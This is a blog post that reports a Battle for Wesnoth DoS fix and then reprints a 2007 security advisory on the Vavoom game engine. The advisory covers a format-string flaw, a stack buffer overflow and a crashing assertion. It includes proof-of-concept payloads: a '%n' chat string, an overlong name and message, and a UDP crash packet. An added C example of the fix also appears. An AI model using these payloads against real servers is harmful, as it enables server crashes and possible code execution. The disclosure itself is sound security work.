I didn't expect to blog twice in the same day regarding Linux gaming, yet anyhow... Battle for Wesnoth is a free turn-based strategy game for personal computers released under the GNU General Public License. The Wesnoth team has released an update fixing a DoS, bringing the stable release to v1.2.7. This is a bugfix release for 1.2.x and it is compatible with the other 1.2.x versions. "The main reason for this release was an important fix where a UTF-8 char at the wrong position in a chat message could crash other clients." This bug was filed as CVE-2007-3917.
#######################################################################
Luigi Auriemma
Application: Vavoom
http://www.vavoom-engine.com
Versions: <= 1.24
Platforms: Windows, DOS, *nix, *BSD and more
Bugs: A] Say format string
B] BroadcastPrintf buffer-overflow
C] "NewLen >= 0" assertion failed
Exploitation: remote, versus server
Date: 23 Aug 2007
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Vavoom is an open source engine based on the GPLed Doom engine with
many interesting features.
#######################################################################
=======
2) Bugs
=======
--------------------
A] Say format string
--------------------
Format string vulnerability exploitable by sending a chat message: the
BroadcastPrintf function is called with a string containing the name of
the user plus his message as the format string itself, without a proper
format argument.
from sv_main.cpp:
    COMMAND(Say)
    {
        guard(COMMAND Say);
        if (Source == SRC_Command)
        {
    #ifdef CLIENT
            ForwardToServer();
    #endif
            return;
        }
        if (Args.Num() < 2)
            return;
        // Text is built from the player name and the chat arguments,
        // both of which are controlled by the remote client
        VStr Text = Player->PlayerName;
        Text += ":";
        for (int i = 1; i < Args.Num(); i++)
        {
            Text += " ";
            Text += Args[i];
        }
        // the client-controlled text is passed as the format string
        GLevelInfo->BroadcastPrintf(*Text);
        GLevelInfo->StartSound(TVec(0, 0, 0), 0,
            GSoundManager->GetSoundID("misc/chat"), 0, 1.0, 0);
        unguard;
    }
----------------------------------
B] BroadcastPrintf buffer-overflow
----------------------------------
Buffer-overflow vulnerability located in the BroadcastPrintf function;
the steps for exploiting it are the same as for the previous bug.
from p_thinker.cpp:
    void VThinker::BroadcastPrintf(const char *s, ...)
    {
        guard(VThinker::BroadcastPrintf);
        va_list v;
        char buf[1024];     // fixed-size stack buffer
        va_start(v, s);
        vsprintf(buf, s, v); // unbounded write: no length limit on buf
        va_end(v);
        for (int i = 0; i < svs.max_clients; i++)
            if (Level->Game->Players[i])
                Level->Game->Players[i]->eventClientPrint(buf);
        unguard;
    }
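The fix both bugs A and B call for is the same: pass client-controlled text as a "%s" argument rather than as the format string, and bound the write into the 1024-byte buffer. The following is an added C example, not Vavoom's own code; the function names, the 1024-byte buffer size and the sample inputs (taken from the PoC values in section 3) are assumptions.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define CHAT_BUF 1024   /* assumption: same buffer size as BroadcastPrintf */

/* Hardened stand-in for BroadcastPrintf: vsnprintf bounds the write and
 * always NUL-terminates. Returns the length the full message needed, so
 * the caller can tell whether it was truncated. */
static int broadcast_printf_safe(char *out, size_t outlen, const char *fmt, ...)
{
    va_list v;
    va_start(v, fmt);
    int needed = vsnprintf(out, outlen, fmt, v);
    va_end(v);
    return needed;
}

/* Hardened stand-in for COMMAND(Say): player name and message are
 * format arguments, so "%n" or "%s" inside them stay literal text. */
static int say_safe(char *out, size_t outlen, const char *player, const char *msg)
{
    return broadcast_printf_safe(out, outlen, "%s: %s", player, msg);
}

/* 1 when the message did not fit into outlen bytes and was cut short. */
static int was_truncated(int needed, size_t outlen)
{
    return needed < 0 || (size_t)needed >= outlen;
}

/* Constructed input mirroring the section 3 PoC: a 64-'a' name plus a
 * 992-'a' message (1058 bytes with the ": " separator). */
static int demo_overflow_input(char *out, size_t outlen)
{
    char name[65], msg[993];
    memset(name, 'a', 64); name[64] = '\0';
    memset(msg, 'a', 992); msg[992] = '\0';
    return say_safe(out, outlen, name, msg);
}

int main(void)
{
    char out[CHAT_BUF];
    int n = say_safe(out, sizeof out, "alice", "%n%n%n%n%s");
    printf("%s (needed=%d, truncated=%d)\n", out, n, was_truncated(n, sizeof out));
    n = demo_overflow_input(out, sizeof out);
    printf("long message: needed=%d, truncated=%d\n", n, was_truncated(n, sizeof out));
    return 0;
}
```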
---------------------------------
C] "NewLen >= 0" assertion failed
---------------------------------
A failed assert in the following function, reached for example when a
string is passed with an invalid size, allows an attacker to terminate
the server.
from str.cpp:
    void VStr::Resize(int NewLen)
    {
        guard(VStr::Resize);
        check(NewLen >= 0);  // a negative length from the network aborts the server here
        ...
#######################################################################
===========
3) The Code
===========
A]
send a chat message containing %n%n%n%n%s
B]
open the cfg file, for example vavoom\basev\doom2\config.cfg, and add
the following lines
alias bof "say aaa...(992_'a's)...aaa"
name "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
C]
send a UDP packet (port 26000) containing the following hex bytes:
80 02 ff 00
#######################################################################
======
4) Fix
======
I have sent an e-mail to the developer
#######################################################################
